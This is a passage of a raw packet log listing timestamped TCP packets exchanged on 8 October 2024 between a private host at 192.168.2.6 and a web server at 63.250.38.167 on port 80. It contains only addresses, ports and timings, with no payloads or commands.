Oct 8, 2024 11:30:48.963345051 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.963350058 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.963350058 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.963360071 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.963375092 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.963404894 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.963408947 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.963408947 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.963447094 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.963681936 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.963704109 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.963713884 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.963720083 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.963731050 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.963749886 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.963762045 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.963773012 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.963829994 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.963829994 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.963829994 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.964030981 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964040041 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964057922 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964082003 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.964096069 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964106083 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964128971 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964138985 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964157104 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964167118 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964173079 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.964173079 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.964371920 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964380980 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964399099 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964426994 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.964426994 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.964436054 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964447021 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964464903 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964474916 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964488983 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.964488983 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.964587927 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964606047 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964622021 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964631081 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964643955 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964652061 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.964653015 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.964664936 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964675903 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964694023 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964703083 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964704990 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.964704990 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.964723110 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964734077 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964751005 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.964780092 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.964781046 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.964868069 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.965455055 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.965465069 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.965478897 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.965594053 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.965790033 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.965802908 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.965809107 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.965828896 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.965838909 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.965857983 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.965873957 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.965873957 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.965888977 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.968449116 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968523979 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.968524933 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968537092 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968555927 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968570948 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968600035 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968609095 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968619108 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.968619108 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.968626976 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968636990 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968655109 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968655109 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.968667030 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968684912 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968704939 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.968704939 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.968728065 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968749046 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968760014 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968810081 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.968810081 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.968838930 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968859911 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968871117 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968887091 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968899012 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968908072 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.968918085 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.968925953 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.969078064 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.969206095 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969233036 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969242096 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969288111 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969300985 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969319105 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969329119 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969336987 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.969336987 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.969372988 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969383955 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969389915 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.969394922 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969445944 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.969445944 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.969842911 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969861031 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969875097 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969887018 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969901085 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969916105 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969935894 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969944954 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969949007 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.969949007 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.969964027 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969974995 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.969990969 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.970000982 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.970004082 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.970004082 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.970020056 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.970030069 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.970048904 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.970053911 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.970053911 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.970058918 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.970078945 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.970088005 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.970107079 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:48.970117092 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.970117092 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:48.971410036 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.012902975 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.051065922 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051090956 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051219940 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.051493883 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051625013 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051645041 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051655054 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051678896 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051688910 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051707983 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051717997 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051727057 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051740885 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051753998 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051753044 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.051753044 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.051753044 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.051767111 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051774025 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.051804066 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.051878929 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051888943 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051903009 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051909924 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.051928043 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051928997 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.051940918 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051953077 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051968098 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051985979 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.051995039 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052011013 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.052011967 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.052012920 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052022934 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052037001 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052042961 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052047014 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052052975 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052056074 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.052056074 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.052066088 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052074909 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052081108 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052086115 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052098036 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052115917 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052125931 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052143097 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052162886 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052176952 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052194118 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052215099 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052225113 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.052225113 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052242041 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052258968 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052292109 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052303076 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052318096 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.052318096 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.052321911 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052334070 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052386045 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.052386045 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.052432060 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052440882 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052458048 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052467108 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052478075 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.052480936 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052501917 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052515030 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052524090 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052555084 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.052597046 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.052624941 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052639961 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052651882 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052659035 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052665949 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052683115 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052692890 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052726030 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052728891 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.052728891 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.052746058 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052756071 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052767992 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.052774906 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052786112 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052804947 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052814007 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052824974 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.052824974 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.052831888 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052848101 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052860022 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052875042 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.052889109 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.052889109 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.053144932 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.054393053 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054402113 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054419994 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054429054 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054447889 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054449081 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.054495096 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.054716110 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054725885 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054744959 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054765940 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054784060 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054794073 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.054794073 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054794073 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.054821968 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054828882 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.054833889 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054852009 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054862022 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054878950 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054891109 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054893970 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.054893970 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.054900885 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054919004 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054929018 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.054944038 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054955006 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054972887 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054981947 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.054992914 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.054992914 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.055000067 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.055010080 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.055027008 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.055042982 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.055042982 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.055078983 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.055118084 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.055263996 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.055274963 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.055289030 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.055304050 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.055306911 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.055320024 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.055331945 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.055346966 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.055358887 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.055358887 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.055358887 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.055377960 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.055403948 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.055406094 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.055414915 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.055435896 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.055514097 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141133070 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141160011 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141170025 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141187906 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141199112 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141202927 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141216993 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141227961 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141256094 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141256094 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141359091 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141369104 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141387939 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141407013 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141417027 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141434908 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141437054 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141437054 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141446114 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141463041 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141473055 CEST	80	49903	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:49.141483068 CEST	49903	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:49.141483068 CEST	49903	80	192.168.2.6	63.250.38.167
